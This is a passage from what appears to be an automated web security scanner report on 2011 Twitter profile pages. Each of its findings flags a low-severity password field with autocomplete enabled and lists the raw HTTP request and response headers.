Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.27545
Content-Type: text/html; charset=utf-8
Content-Length: 51283
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2604599861276ed667e0648e088146246370a561" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.98. http://twitter.com/harvardlampoon

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /harvardlampoon

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /harvardlampoon HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265997-31045-3388
ETag: "dd05aa33a38e41399f97d64b699efc32"
Last-Modified: Sat, 29 Jan 2011 01:53:17 GMT
X-Runtime: 0.01350
Content-Type: text/html; charset=utf-8
Content-Length: 19877
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.99. http://twitter.com/j_hollender

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /j_hollender

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /j_hollender HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-34363-18254
ETag: "ff41031bc88714d0c96acba56a4b58e3"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.01703
Content-Type: text/html; charset=utf-8
Content-Length: 50673
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="96dafd13f066119238730641bf2bfe8f125b617d" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.100. http://twitter.com/jayleno

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /jayleno

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /jayleno HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265975-96833-20443
ETag: "f04375a0a64efa284a42025451fab18b"
Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT
X-Runtime: 0.01621
Content-Type: text/html; charset=utf-8
Content-Length: 52179
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.101. http://twitter.com/jbchang

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /jbchang

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /jbchang HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265833-44616-32351
ETag: "48cc8fb365481ae35c75282f1de941fe"
Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT
X-Runtime: 0.02514
Content-Type: text/html; charset=utf-8
Content-Length: 50548
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="cf6297d2b604ece5d7d1eac3182e6b4e0a9f4e36" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.102. http://twitter.com/joedwinell/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /joedwinell/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /joedwinell/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265290-93276-31294
ETag: "17022c0def3fb9af583820ad4dacfa32"
Last-Modified: Sat, 29 Jan 2011 01:41:30 GMT
X-Runtime: 0.00712
Content-Type: text/html; charset=utf-8
Content-Length: 52042
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.103. http://twitter.com/joemccann

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /joemccann

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /joemccann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225039-24458-21657
ETag: "2185bda414323413d07c805828e8deaa"
Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT
X-Runtime: 0.01186
Content-Type: text/html; charset=utf-8
Content-Length: 50599
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="35ac626ce8e99e9216e0cfb3dfaa24178da4d2f1" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.104. http://twitter.com/jordanknight

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /jordanknight

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /jordanknight HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265969-53407-37171
ETag: "a1dbaefbdb244bad17317656f8f51eb0"
Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT
X-Runtime: 0.01240
Content-Type: text/html; charset=utf-8
Content-Length: 47864
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="5645a5ca516e920fa91693e772b8bb87095b3c78" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.105. http://twitter.com/kennychesney

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /kennychesney

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /kennychesney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265830-80729-13721
ETag: "3e686e5003db7b91a9692a9a7630bbcc"
Last-Modified: Sat, 29 Jan 2011 01:50:30 GMT
X-Runtime: 0.00912
Content-Type: text/html; charset=utf-8
Content-Length: 47073
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="6e3c82467b44d38ed3d92cc43ff548f8e14849a1" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.106. http://twitter.com/kfaulk33

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /kfaulk33

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /kfaulk33 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:29 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265289-31703-49385
ETag: "41ff3b86a38408792b4fb731bddc8cc7"
